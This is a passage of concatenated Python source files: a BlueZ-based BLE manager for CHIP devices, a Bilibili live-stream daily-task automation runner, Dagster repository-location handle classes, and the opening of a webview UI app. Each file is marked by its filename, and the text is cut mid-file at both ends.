result = self.device_properties.Get(
DEVICE_INTERFACE, "ServicesResolved")
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
class BluezDbusGattService:
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger("ChipBLEMgr")
self.object = bluez_obj
self.service = dbus.Interface(bluez_obj, SERVICE_INTERFACE)
self.service_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.bluez = bluez
self.bus = bus
self.path = self.service.object_path
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy GattService")
self.service = None
self.service_properties = None
self.bluez = None
self.bus = None
self.object = None
self.path = None
@property
def uuid(self):
try:
result = uuid.UUID(
str(self.service_properties.Get(SERVICE_INTERFACE, "UUID"))
)
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def Primary(self):
try:
result = bool(self.service_properties.Get(
SERVICE_INTERFACE, "Primary"))
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
@property
def Device(self):
try:
result = self.service_properties.Get(SERVICE_INTERFACE, "Device")
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
def find_characteristic(self, uuid):
try:
expired = time.time() + BLE_CHAR_DISCOVERY_TIMEOUT_SEC
while time.time() < expired:
characteristics = [
BluezDbusGattCharacteristic(
p["object"], self.bluez, self.bus, self.logger
)
for p in get_bluez_objects(
self.bluez, self.bus, CHARACTERISTIC_INTERFACE, self.path
)
]
for characteristic in characteristics:
if characteristic.uuid == uuid:
return characteristic
time.sleep(BLE_IDLE_DELTA)
self.logger.error("Char discovering fail")
return None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
class BluezDbusGattCharacteristic:
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger("ChipBLEMgr")
self.object = bluez_obj
self.characteristic = dbus.Interface(
bluez_obj, CHARACTERISTIC_INTERFACE)
self.characteristic_properties = dbus.Interface(
bluez_obj, DBUS_PROPERTIES)
self.received = None
self.path = self.characteristic.object_path
self.bluez = bluez
self.bus = bus
self.signalReceiver = None
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy GattCharacteristic")
self.gattCharacteristic_unregister_signal()
self.characteristic = None
self.object = None
self.characteristic_properties = None
self.received = None
self.bluez = None
self.bus = None
self.path = None
self.signalReceiver = None
def gattCharacteristic_register_signal(self):
if not self.signalReceiver:
self.logger.debug("add GattCharacteristic signal")
self.signalReceiver = self.bus.add_signal_receiver(
self.gatt_on_characteristic_changed_cb,
bus_name=BLUEZ_NAME,
dbus_interface=DBUS_PROPERTIES,
signal_name="PropertiesChanged",
path=self.path,
)
def gattCharacteristic_unregister_signal(self):
if self.signalReceiver:
self.logger.debug("remove GattCharacteristic signal")
self.bus.remove_signal_receiver(
self.signalReceiver,
bus_name=BLUEZ_NAME,
signal_name="PropertiesChanged",
dbus_interface=DBUS_PROPERTIES,
path=self.path,
)
self.signalReceiver = None
def gatt_on_characteristic_changed_cb(
self, interface, changed_properties, invalidated_properties
):
self.logger.debug(
"property change in" +
str(self.characteristic) + str(changed_properties)
)
if len(changed_properties) == 0:
return
if len(invalidated_properties) > 0:
return
if interface == CHARACTERISTIC_INTERFACE:
if "Value" in changed_properties:
if self.received:
self.received(changed_properties["Value"])
def WriteValue(self, value, options, reply_handler, error_handler, timeout):
try:
self.characteristic.WriteValue(
value,
options,
reply_handler=reply_handler,
error_handler=error_handler,
timeout=timeout,
)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except Exception as ex:
self.logger.debug(traceback.format_exc())
@property
def uuid(self):
try:
result = uuid.UUID(
str(
self.characteristic_properties.Get(
CHARACTERISTIC_INTERFACE, "UUID")
)
)
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
def StartNotify(self, cbfunct, reply_handler, error_handler, timeout):
try:
if not cbfunct:
self.logger.info("please provide the notify callback function")
self.received = cbfunct
self.gattCharacteristic_register_signal()
self.characteristic.StartNotify(
reply_handler=reply_handler,
error_handler=error_handler,
timeout=timeout,
)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except Exception as ex:
self.logger.debug(traceback.format_exc())
def StopNotify(self, reply_handler, error_handler, timeout):
try:
self.logger.debug("stopping notifying")
self.characteristic.StopNotify(
reply_handler=reply_handler,
error_handler=error_handler,
timeout=timeout,
)
self.gattCharacteristic_unregister_signal()
self.received = None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except Exception as ex:
self.logger.debug(traceback.format_exc())
@property
def Notifying(self):
try:
result = self.characteristic_properties.Get(
CHARACTERISTIC_INTERFACE, "Notifying"
)
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
class BluezManager(ChipBleBase):
def __init__(self, devMgr, logger=None):
if logger:
self.logger = logger
else:
self.logger = logging.getLogger("ChipBLEMgr")
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(name)-12s %(levelname)-8s %(message)s",
)
self.scan_quiet = False
self.peripheral_list = []
self.device_uuid_list = []
self.chip_queue = queue.Queue()
self.Gmainloop = None
self.daemon_thread = None
self.adapter = None
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
GObject.threads_init()
dbus.mainloop.glib.threads_init()
self.bus = dbus.SystemBus()
self.bluez = dbus.Interface(
self.bus.get_object(
BLUEZ_NAME, "/"), "org.freedesktop.DBus.ObjectManager"
)
self.target = None
self.service = None
self.orig_input_hook = None
self.hookFuncPtr = None
self.connect_state = False
self.tx = None
self.rx = None
self.setInputHook(self.readlineCB)
self.devMgr = devMgr
self.devMgr.SetBlockingCB(self.devMgrCB)
def __del__(self):
self.disconnect()
self.setInputHook(self.orig_input_hook)
def ble_adapter_select(self, identifier=None):
if self.adapter:
self.adapter.destroy()
self.adapter = None
self.adapter = self.get_adapter_by_addr(identifier)
self.adapter.adapter_register_signal()
self.adapter.Powered(False)
self.adapter.Powered(True)
def get_adapters(self):
return [
BluezDbusAdapter(p["object"], self.bluez, self.bus, self.logger)
for p in get_bluez_objects(
self.bluez, self.bus, ADAPTER_INTERFACE, "/org/bluez"
)
]
def ble_adapter_print(self):
try:
adapters = [
BluezDbusAdapter(p["object"], self.bluez,
self.bus, self.logger)
for p in get_bluez_objects(
self.bluez, self.bus, ADAPTER_INTERFACE, "/org/bluez"
)
]
for i in range(len(adapters)):
self.logger.info("AdapterName: %s AdapterAddress: %s" % (
adapters[i].path.replace("/org/bluez/", ""), adapters[i].Address))
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
def get_adapter_by_addr(self, identifier):
try:
adapters = [
BluezDbusAdapter(p["object"], self.bluez,
self.bus, self.logger)
for p in get_bluez_objects(
self.bluez, self.bus, ADAPTER_INTERFACE, "/org/bluez"
)
]
if identifier is None:
return adapters[0]
if len(adapters) > 0:
for adapter in adapters:
if str(adapter.Address).upper() == str(identifier).upper() or "/org/bluez/{}".format(identifier) == str(adapter.path):
return adapter
self.logger.info(
"adapter %s cannot be found, expect the ble mac address" % (
identifier)
)
return None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
def runLoopUntil(self, target=None, **kwargs):
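# Runs the GLib main loop on the calling thread while `target` executes on a
# daemon thread; running_thread() quits the loop once `target` returns, so
# this call behaves synchronously.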
if target:
self.daemon_thread = threading.Thread(
target=self.running_thread, args=(target, kwargs)
)
self.daemon_thread.daemon = True
self.daemon_thread.start()
try:
self.Gmainloop = GObject.MainLoop()
self.Gmainloop.run()
except KeyboardInterrupt:
self.Gmainloop.quit()
sys.exit(1)
def running_thread(self, target, kwargs):
try:
while not self.Gmainloop or not self.Gmainloop.is_running():
time.sleep(0.00001)
target(**kwargs)
except Exception as err:
traceback.print_exc()
finally:
self.Gmainloop.quit()
def setInputHook(self, hookFunc):
"""Set the PyOS_InputHook to call the specific function."""
hookFunctionType = CFUNCTYPE(None)
self.hookFuncPtr = hookFunctionType(hookFunc)
pyos_inputhook_ptr = c_void_p.in_dll(pythonapi, "PyOS_InputHook")
# save the original so that on del we can revert it back to the way it was.
self.orig_input_hook = cast(
pyos_inputhook_ptr.value, PYFUNCTYPE(c_int))
# set the new hook. readLine will call this periodically as it polls for input.
pyos_inputhook_ptr.value = cast(self.hookFuncPtr, c_void_p).value
def runIdleLoop(self, **kwargs):
time.sleep(0)
def devMgrCB(self):
self.runLoopUntil(self.runIdleLoop)
def readlineCB(self):
self.runLoopUntil(self.runIdleLoop)
if self.orig_input_hook:
self.orig_input_hook()
def dump_scan_result(self, device):
self.logger.info("{0:<16}= {1}".format("Name", device.Name))
self.logger.info("{0:<16}= {1}".format("ID", device.device_id))
self.logger.info("{0:<16}= {1}".format("RSSI", device.RSSI))
self.logger.info("{0:<16}= {1}".format("Address", device.Address))
devIdInfo = self.get_peripheral_devIdInfo(device)
if devIdInfo is not None:
self.logger.info("{0:<16}= {1}".format(
"Pairing State", devIdInfo.pairingState))
self.logger.info("{0:<16}= {1}".format(
"Discriminator", devIdInfo.discriminator))
self.logger.info("{0:<16}= {1}".format(
"Vendor Id", devIdInfo.vendorId))
self.logger.info("{0:<16}= {1}".format(
"Product Id", devIdInfo.productId))
if device.ServiceData:
for advuuid in device.ServiceData:
self.logger.info("{0:<16}= {1}".format(
"Adv UUID", str(advuuid)))
self.logger.info("{0:<16}= {1}".format(
"Adv Data", bytes(device.ServiceData[advuuid]).hex()))
else:
self.logger.info("")
self.logger.info("")
def scan_bg_implementation(self, **kwargs):
self.adapter.clear_adapter()
with self.chip_queue.mutex:
self.chip_queue.queue.clear()
self.adapter.adapter_bg_scan(True)
found = False
identifier = kwargs["identifier"]
timeout = kwargs["timeout"] + time.time()
self.device_uuid_list = []
self.peripheral_list = []
while time.time() < timeout:
scanned_peripheral_list = self.adapter.find_devices(
[
chip_service,
chip_service_short,
chromecast_setup_service,
chromecast_setup_service_short,
]
)
for device in scanned_peripheral_list:
try:
if not self.scan_quiet and device.Address not in self.device_uuid_list:
# display all scanned results
self.device_uuid_list.append(device.Address)
self.peripheral_list.append(device)
self.dump_scan_result(device)
devIdInfo = self.get_peripheral_devIdInfo(device)
if not devIdInfo:
# Not a chip device
continue
if identifier and (device.Name == identifier or str(device.Address).upper() == str(
identifier.upper()
) or str(devIdInfo.discriminator) == identifier):
if self.scan_quiet:
# only display the scanned target's info when quiet
self.dump_scan_result(device)
self.target = device
found = True
break
except Exception:
traceback.print_exc()
if found:
break
time.sleep(BLE_IDLE_DELTA)
self.adapter.adapter_bg_scan(False)
def scan(self, line):
args = self.ParseInputLine(line, "scan")
if not args:
return False
self.target = None
if not self.adapter:
self.logger.info("use default adapter")
self.ble_adapter_select()
del self.peripheral_list[:]
self.scan_quiet = args[1]
self.runLoopUntil(
self.scan_bg_implementation, timeout=args[0], identifier=args[2]
)
return True
def get_peripheral_devIdInfo(self, peripheral):
if not peripheral.ServiceData:
return None
for advuuid in peripheral.ServiceData:
if str(advuuid).lower() == str(chip_service).lower():
return ParseServiceData(bytes(peripheral.ServiceData[advuuid]))
return None
def ble_debug_log(self, line):
args = self.ParseInputLine(line)
if int(args[0]) == 1:
self.logger.setLevel(logging.DEBUG)
self.logger.debug("current logging level is debug")
else:
self.logger.setLevel(logging.INFO)
self.logger.info("current logging level is info")
return True
def CloseBle(self, connObj):
""" Called by Chip to close the BLE connection."""
# Workaround: disconnect is commented out because it hangs during close; please call disconnect explicitly after close.
# TODO: fix this properly.
# self.disconnect()
if self.devMgr:
dcEvent = BleDisconnectEvent(BLE_ERROR_REMOTE_DEVICE_DISCONNECTED)
self.chip_queue.put(dcEvent)
self.devMgr.DriveBleIO()
return True
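# A hedged usage sketch (illustrative only; it assumes a running BlueZ stack
# and a Chip device manager instance `devMgr`, and that `scan_line` is a scan
# command line in the format accepted by ChipBleBase.ParseInputLine):
#
#   mgr = BluezManager(devMgr)
#   mgr.ble_adapter_print()          # list the available BLE adapters
#   mgr.ble_adapter_select("hci0")   # select one by name or MAC address
#   mgr.scan(scan_line)              # scan for CHIP devices over BLE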
|
test_main.py
|
import sys
import signal
import threading
import asyncio
from copy import deepcopy
import aiohttp
import conf_loader
import notifier
import bili_sched
import printer
import bili_statistics
from console_cmd import ConsoleCmd
from tasks.login import LoginTask
from tasks.live_daily_job import (HeartBeatTask, OpenSilverBoxTask, RecvDailyBagTask, SignTask, WatchTvTask,
SignFansGroupsTask, SendGiftTask, ExchangeSilverCoinTask)
from tasks.main_daily_job import (JudgeCaseTask, BiliMainTask, DahuiyuanTask)
from tasks.manga_daily_job import (ShareComicTask, MangaSignTask, )
from tasks.utils import UtilsTask
# danmu (live chat) monitoring
from danmu.bili_danmu_monitor import DanmuPrinter, DanmuRaffleMonitor
from danmu.yj_monitor import TcpYjMonitorClient
from danmu import raffle_handler
# physical prize raffles
from substance.monitor_substance_raffle import SubstanceRaffleMonitor
from dyn.monitor_dyn_raffle import DynRaffleMonitor
from Service.Crsa import rsa_long_decrypt
from multiprocessing import connection
def run(user_info: dict, pipe: connection.Connection):
"""
:param user_info: user information
:param pipe: pipe for inter-process communication
:return:
"""
notifier.register_pipe(pipe)
user_info['password'] = rsa_long_decrypt(eval(user_info['password']))
user_info_copy = deepcopy(user_info)
# print(user_info['password'])
loop = asyncio.get_event_loop()
dict_bili = conf_loader.read_bili()
dict_color = conf_loader.read_color()
dict_ctrl = conf_loader.read_ctrl()
dict_task = conf_loader.read_task()
printer.init_config(dict_color, dict_ctrl['print_control']['danmu'])
############################################################################
############################################################################
# 👇 user registration
async def init_users():
global_task_control = dict_task['global_task_control']
custom_task_control = dict_task['custom_task_control']
global_task_arrangement = dict_task['global_task_arrangement']
custom_task_arrangement = dict_task['custom_task_arrangement']
users = notifier.Users(global_task_control=global_task_control,
global_task_arrangement=global_task_arrangement,
dict_bili=dict_bili,
force_sleep=bili_sched.force_sleep)
notifier.init(users=users)
username = user_info['username']
await notifier.add_user(user_info=user_info_copy,
custom_task_control=custom_task_control.get(username, {}),
custom_task_arrangement=custom_task_arrangement.get(username, {}))
loop.run_until_complete(init_users())
############################################################################
############################################################################
# 👇 recurring-task registration
# Intervals are in hours; every time a sleep period ends the timer resets and the interval is counted from the current time again.
# The values below are the number of hours between runs.
def add_daily_jobs(tasks):
bili_sched.add_daily_jobs(HeartBeatTask, every_hours=6) # heartbeat
bili_sched.add_daily_jobs(OpenSilverBoxTask, every_hours=6) # open the daily silver box
bili_sched.add_daily_jobs(RecvDailyBagTask, every_hours=3) # collect daily gift bags
bili_sched.add_daily_jobs(SignTask, every_hours=6) # live-stream sign-in
bili_sched.add_daily_jobs(WatchTvTask, every_hours=6) # watch task for both clients
bili_sched.add_daily_jobs(SignFansGroupsTask, every_hours=6) # fan-group sign-in
bili_sched.add_daily_jobs(SendGiftTask, every_hours=2) # gift sending
bili_sched.add_daily_jobs(ExchangeSilverCoinTask, every_hours=6) # silver-coin exchange
bili_sched.add_daily_jobs(JudgeCaseTask, every_hours=0.75) # judgement (case-voting) task
bili_sched.add_daily_jobs(BiliMainTask, every_hours=4) # main-site tasks
bili_sched.add_daily_jobs(MangaSignTask, every_hours=6) # manga sign-in
bili_sched.add_daily_jobs(ShareComicTask, every_hours=6) # manga sharing
bili_sched.add_daily_jobs(DahuiyuanTask, every_hours=6)
if user_info.get('tasks'):
tasks = user_info.get('tasks')
else:
tasks = []
add_daily_jobs(tasks)
############################################################################
############################################################################
# log in
loop.run_until_complete(notifier.exec_task(LoginTask))
other_control = dict_ctrl['other_control']
area_ids = loop.run_until_complete(notifier.exec_func(UtilsTask.fetch_blive_areas))
area_duplicated = other_control['area_duplicated']
if area_duplicated:
area_ids *= 2
bili_statistics.init(area_num=len(area_ids), area_duplicated=area_duplicated)
default_roomid = other_control['default_monitor_roomid']
############################################################################
############################################################################
# 👇 register monitors
# shared aiohttp session
async def init_monitors():
session = aiohttp.ClientSession()
monitors_ = []
# danmu printer
danmu_printer_ = DanmuPrinter(
room_id=default_roomid,
area_id=-1,
session=session)
# danmu raffle monitors
for area_id in area_ids:
monitor = DanmuRaffleMonitor(
room_id=0,
area_id=area_id,
session=session)
monitors_.append(monitor)
# yjmonitor danmu monitoring
yjmonitor_tcp_addr = other_control['yjmonitor_tcp_addr']
yjmonitor_tcp_key = other_control['yjmonitor_tcp_key']
if yjmonitor_tcp_key:
monitor = TcpYjMonitorClient(
key=yjmonitor_tcp_key,
url=yjmonitor_tcp_addr,
area_id=0)
monitors_.append(monitor)
if other_control['substance_raffle']:
monitors_.append(SubstanceRaffleMonitor())
if other_control['dyn_raffle']:
monitors_.append(DynRaffleMonitor(
should_join_immediately=other_control['join_dyn_raffle_at_once']))
return danmu_printer_, monitors_
danmu_printer, monitors = loop.run_until_complete(init_monitors())
############################################################################
############################################################################
bili_sched.init(monitors=monitors, sleep_ranges=dict_ctrl['other_control']['sleep_ranges'])
# initialize the console
if sys.platform != 'linux' or signal.getsignal(signal.SIGHUP) == signal.SIG_DFL:
console_thread = threading.Thread(
target=ConsoleCmd(loop, default_roomid, danmu_printer).cmdloop)
console_thread.start()
else:
console_thread = None
tasks = [monitor.run() for monitor in monitors]
other_tasks = [
bili_sched.run(),
raffle_handler.run(),
danmu_printer.run()
]
if other_tasks:
loop.run_until_complete(asyncio.wait(tasks + other_tasks))
loop.run_forever()
if console_thread is not None:
console_thread.join()
from Service.wbs import Client, test_cbk
if __name__ == '__main__':
client = Client()
client.register_cbk(test_cbk)
client.work("ws://127.0.0.1:8000/ws/Slaver", run)
|
handle.py
|
import sys
import threading
from abc import ABCMeta, abstractmethod
from collections import namedtuple
import six
from dagster import check
from dagster.api.list_repositories import sync_list_repositories_grpc
from dagster.core.definitions.reconstructable import repository_def_from_pointer
from dagster.core.errors import DagsterInvariantViolationError
from dagster.core.host_representation.origin import (
ExternalRepositoryOrigin,
GrpcServerRepositoryLocationOrigin,
InProcessRepositoryLocationOrigin,
ManagedGrpcPythonEnvRepositoryLocationOrigin,
RepositoryLocationOrigin,
)
from dagster.core.host_representation.selector import PipelineSelector
from dagster.core.instance import DagsterInstance
from dagster.core.origin import RepositoryGrpcServerOrigin, RepositoryOrigin, RepositoryPythonOrigin
def _get_repository_python_origin(executable_path, repository_code_pointer_dict, repository_name):
if repository_name not in repository_code_pointer_dict:
raise DagsterInvariantViolationError(
"Unable to find repository name {} on GRPC server.".format(repository_name)
)
code_pointer = repository_code_pointer_dict[repository_name]
return RepositoryPythonOrigin(executable_path=executable_path, code_pointer=code_pointer)
class RepositoryLocationHandle(six.with_metaclass(ABCMeta)):
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.cleanup()
def cleanup(self):
pass
@staticmethod
def create_from_repository_location_origin(repo_location_origin):
check.inst_param(repo_location_origin, "repo_location_origin", RepositoryLocationOrigin)
if isinstance(repo_location_origin, ManagedGrpcPythonEnvRepositoryLocationOrigin):
return ManagedGrpcPythonEnvRepositoryLocationHandle(repo_location_origin)
elif isinstance(repo_location_origin, GrpcServerRepositoryLocationOrigin):
return GrpcServerRepositoryLocationHandle(repo_location_origin)
elif isinstance(repo_location_origin, InProcessRepositoryLocationOrigin):
return InProcessRepositoryLocationHandle(repo_location_origin)
else:
check.failed("Unexpected repository location origin")
@staticmethod
def create_from_repository_origin(repository_origin, instance):
check.inst_param(repository_origin, "repository_origin", RepositoryOrigin)
check.inst_param(instance, "instance", DagsterInstance)
if isinstance(repository_origin, RepositoryGrpcServerOrigin):
return RepositoryLocationHandle.create_from_repository_location_origin(
GrpcServerRepositoryLocationOrigin(
port=repository_origin.port,
socket=repository_origin.socket,
host=repository_origin.host,
)
)
elif isinstance(repository_origin, RepositoryPythonOrigin):
loadable_target_origin = repository_origin.loadable_target_origin
repo_location_origin = ManagedGrpcPythonEnvRepositoryLocationOrigin(
loadable_target_origin
)
return RepositoryLocationHandle.create_from_repository_location_origin(
repo_location_origin
)
else:
raise DagsterInvariantViolationError("Unexpected repository origin type")
@abstractmethod
def get_repository_python_origin(self, repository_name):
pass
class GrpcServerRepositoryLocationHandle(RepositoryLocationHandle):
"""
Represents a gRPC server that Dagster is not responsible for managing.
"""
def __init__(self, origin):
from dagster.grpc.client import DagsterGrpcClient
self.origin = check.inst_param(origin, "origin", GrpcServerRepositoryLocationOrigin)
port = self.origin.port
socket = self.origin.socket
host = self.origin.host
self.client = DagsterGrpcClient(port=port, socket=socket, host=host)
list_repositories_response = sync_list_repositories_grpc(self.client)
self.repository_names = set(
symbol.repository_name for symbol in list_repositories_response.repository_symbols
)
self.executable_path = list_repositories_response.executable_path
self.repository_code_pointer_dict = list_repositories_response.repository_code_pointer_dict
@property
def port(self):
return self.origin.port
@property
def socket(self):
return self.origin.socket
@property
def host(self):
return self.origin.host
@property
def location_name(self):
return self.origin.location_name
def get_current_image(self):
job_image = self.client.get_current_image().current_image
if not job_image:
raise DagsterInvariantViolationError(
"Unable to get current image that GRPC server is running. Please make sure that "
"env var DAGSTER_CURRENT_IMAGE is set in the GRPC server and contains the most "
"up-to-date user code image and tag. Exiting."
)
return job_image
def get_repository_python_origin(self, repository_name):
return _get_repository_python_origin(
self.executable_path, self.repository_code_pointer_dict, repository_name
)
def reload_repository_python_origin(self, repository_name):
check.str_param(repository_name, "repository_name")
list_repositories_response = sync_list_repositories_grpc(self.client)
return _get_repository_python_origin(
list_repositories_response.executable_path,
list_repositories_response.repository_code_pointer_dict,
repository_name,
)
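# Illustrative sketch (an assumption, not original Dagster code): obtaining a handle for
# an externally managed gRPC server through the factory above, assuming a server is
# already listening. The host/port values and the "my_repo" name are hypothetical.
#
#   origin = GrpcServerRepositoryLocationOrigin(host="localhost", port=4000, socket=None)
#   with RepositoryLocationHandle.create_from_repository_location_origin(origin) as handle:
#       repo_origin = handle.get_repository_python_origin("my_repo")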
class ManagedGrpcPythonEnvRepositoryLocationHandle(RepositoryLocationHandle):
"""
A Python environment for which Dagster is managing a gRPC server.
"""
def __init__(self, origin):
from dagster.grpc.client import client_heartbeat_thread
from dagster.grpc.server import GrpcServerProcess
self.origin = check.inst_param(
origin, "origin", ManagedGrpcPythonEnvRepositoryLocationOrigin
)
loadable_target_origin = origin.loadable_target_origin
self.grpc_server_process = GrpcServerProcess(
loadable_target_origin=loadable_target_origin,
max_workers=2,
heartbeat=True,
lazy_load_user_code=True,
)
try:
self.client = self.grpc_server_process.create_ephemeral_client()
self.heartbeat_shutdown_event = threading.Event()
self.heartbeat_thread = threading.Thread(
target=client_heartbeat_thread, args=(self.client, self.heartbeat_shutdown_event)
)
self.heartbeat_thread.daemon = True
self.heartbeat_thread.start()
list_repositories_response = sync_list_repositories_grpc(self.client)
except:
self.cleanup()
raise
self.repository_code_pointer_dict = list_repositories_response.repository_code_pointer_dict
def get_repository_python_origin(self, repository_name):
return _get_repository_python_origin(
self.executable_path, self.repository_code_pointer_dict, repository_name
)
@property
def executable_path(self):
return self.loadable_target_origin.executable_path
@property
def location_name(self):
return self.origin.location_name
@property
def loadable_target_origin(self):
return self.origin.loadable_target_origin
@property
def repository_names(self):
return set(self.repository_code_pointer_dict.keys())
@property
def host(self):
return "localhost"
@property
def port(self):
return self.grpc_server_process.port
@property
def socket(self):
return self.grpc_server_process.socket
def cleanup(self):
if self.heartbeat_shutdown_event:
self.heartbeat_shutdown_event.set()
self.heartbeat_shutdown_event = None
if self.heartbeat_thread:
self.heartbeat_thread.join()
self.heartbeat_thread = None
if self.client:
self.client.cleanup_server()
self.client = None
@property
def is_cleaned_up(self):
return not self.client
def __del__(self):
check.invariant(
self.is_cleaned_up,
"Deleting a ManagedGrpcPythonEnvRepositoryLocationHandle without first cleaning it up."
" This may indicate that the handle is not being used as a contextmanager.",
)
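# Illustrative sketch (an assumption, not original Dagster code): the __del__ invariant
# above expects cleanup() to have run, which the context-manager protocol on
# RepositoryLocationHandle guarantees. `loadable_target_origin` is a placeholder value.
#
#   origin = ManagedGrpcPythonEnvRepositoryLocationOrigin(loadable_target_origin)
#   with RepositoryLocationHandle.create_from_repository_location_origin(origin) as handle:
#       ...  # use the handle; cleanup() shuts down the managed gRPC server on exit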
class InProcessRepositoryLocationHandle(RepositoryLocationHandle):
def __init__(self, origin):
self.origin = check.inst_param(origin, "origin", InProcessRepositoryLocationOrigin)
pointer = self.origin.recon_repo.pointer
repo_def = repository_def_from_pointer(pointer)
self.repository_code_pointer_dict = {repo_def.name: pointer}
@property
def location_name(self):
return self.origin.location_name
def get_repository_python_origin(self, repository_name):
return _get_repository_python_origin(
sys.executable, self.repository_code_pointer_dict, repository_name
)
class RepositoryHandle(
namedtuple("_RepositoryHandle", "repository_name repository_location_handle")
):
def __new__(cls, repository_name, repository_location_handle):
return super(RepositoryHandle, cls).__new__(
cls,
check.str_param(repository_name, "repository_name"),
check.inst_param(
repository_location_handle, "repository_location_handle", RepositoryLocationHandle
),
)
def get_origin(self):
if isinstance(self.repository_location_handle, InProcessRepositoryLocationHandle):
return RepositoryPythonOrigin(
code_pointer=self.repository_location_handle.repository_code_pointer_dict[
self.repository_name
],
executable_path=sys.executable,
)
elif isinstance(
self.repository_location_handle, ManagedGrpcPythonEnvRepositoryLocationHandle
):
return RepositoryPythonOrigin(
code_pointer=self.repository_location_handle.repository_code_pointer_dict[
self.repository_name
],
executable_path=self.repository_location_handle.executable_path,
)
elif isinstance(self.repository_location_handle, GrpcServerRepositoryLocationHandle):
return RepositoryGrpcServerOrigin(
host=self.repository_location_handle.host,
port=self.repository_location_handle.port,
socket=self.repository_location_handle.socket,
repository_name=self.repository_name,
)
else:
check.failed(
"Can not target represented RepositoryDefinition locally for repository from a {}.".format(
self.repository_location_handle.__class__.__name__
)
)
def get_external_origin(self):
return ExternalRepositoryOrigin(
self.repository_location_handle.origin, self.repository_name,
)
def get_python_origin(self):
return self.repository_location_handle.get_repository_python_origin(self.repository_name)
class PipelineHandle(namedtuple("_PipelineHandle", "pipeline_name repository_handle")):
def __new__(cls, pipeline_name, repository_handle):
return super(PipelineHandle, cls).__new__(
cls,
check.str_param(pipeline_name, "pipeline_name"),
check.inst_param(repository_handle, "repository_handle", RepositoryHandle),
)
def to_string(self):
return "{self.location_name}.{self.repository_name}.{self.pipeline_name}".format(self=self)
@property
def repository_name(self):
return self.repository_handle.repository_name
@property
def location_name(self):
return self.repository_handle.repository_location_handle.location_name
def get_origin(self):
return self.repository_handle.get_origin().get_pipeline_origin(self.pipeline_name)
def get_external_origin(self):
return self.repository_handle.get_external_origin().get_pipeline_origin(self.pipeline_name)
def get_python_origin(self):
return self.repository_handle.get_python_origin().get_pipeline_origin(self.pipeline_name)
def to_selector(self):
return PipelineSelector(self.location_name, self.repository_name, self.pipeline_name, None)
class ScheduleHandle(namedtuple("_ScheduleHandle", "schedule_name repository_handle")):
def __new__(cls, schedule_name, repository_handle):
return super(ScheduleHandle, cls).__new__(
cls,
check.str_param(schedule_name, "schedule_name"),
check.inst_param(repository_handle, "repository_handle", RepositoryHandle),
)
@property
def repository_name(self):
return self.repository_handle.repository_name
@property
def location_name(self):
return self.repository_handle.repository_location_handle.location_name
def get_origin(self):
return self.repository_handle.get_origin().get_schedule_origin(self.schedule_name)
def get_external_origin(self):
return self.repository_handle.get_external_origin().get_schedule_origin(self.schedule_name)
class PartitionSetHandle(namedtuple("_PartitionSetHandle", "partition_set_name repository_handle")):
def __new__(cls, partition_set_name, repository_handle):
return super(PartitionSetHandle, cls).__new__(
cls,
check.str_param(partition_set_name, "partition_set_name"),
check.inst_param(repository_handle, "repository_handle", RepositoryHandle),
)
@property
def repository_name(self):
return self.repository_handle.repository_name
@property
def location_name(self):
return self.repository_handle.repository_location_handle.location_name
|
app.py
|
#coding: utf-8
from youey.view import *
import json, os
from urllib.parse import unquote
import platform
platf = platform.platform()
webview_provider = 'Pythonista' if 'iPhone' in platf or 'iPad' in platf else 'pywebview'
class AppBase(View):
def __init__(self, title='Youey App', fullscreen=None):
self.root = self
self._all_views_by_id = {}
self.views = {}
self._fullscreen = self.fullscreen_default if fullscreen is None else fullscreen
self._enabled_js_libraries = set()
with open(os.path.dirname(__file__)+'/main-ui.html', 'r', encoding='utf-8') as main_html_file:
#with open('youey/main-ui.html', 'r', encoding='utf-8') as main_html_file:
main_html = main_html_file.read()
main_html = main_html.replace('[actual send code]', self.callback_code)
self.open_webview(title, main_html)
def _set_event_handler(self, view, event, handler, options):
view._event_handlers[event] = handler
self.webview.eval_js(f'''
mc = new Hammer.Manager(document.getElementById("{view.id}"));
mc.on("{event}", function(ev) {{
id = "{view.id}";
type = ev.type;
sendEvent(type, id, ev);
}});
''')
#self.webview.eval_js(f'youey_handlers["{view.id}-{event}"] = true;')
if len(view._event_handlers) == 1:
view._events_enabled = True
def _remove_event_handler(self, view, event):
del view._event_handlers[event]
#self.webview.eval_js(f'youey_handlers["{view.id}-{event}"] = false;')
if len(view._event_handlers) == 0:
view._events_enabled = False
def _handle_event_callback(self, event, params):
if event == 'hammer.input':
print('unhandled hammer.input')
return
target = self
event_args = params
if len(params) == 1 and type(params[0]) is dict and 'id' in params[0]:
id = params[0]['id']
target = self._all_views_by_id[id]
getattr(target, 'on_'+event)()
return
if len(params) == 2:
id = params[0]
target = self._all_views_by_id[id]
event_args = params[1]
if event == 'action':
getattr(target, 'on_action')()
else:
handler = getattr(target, 'on_'+event)
handler(event_args)
def on_error(self, params):
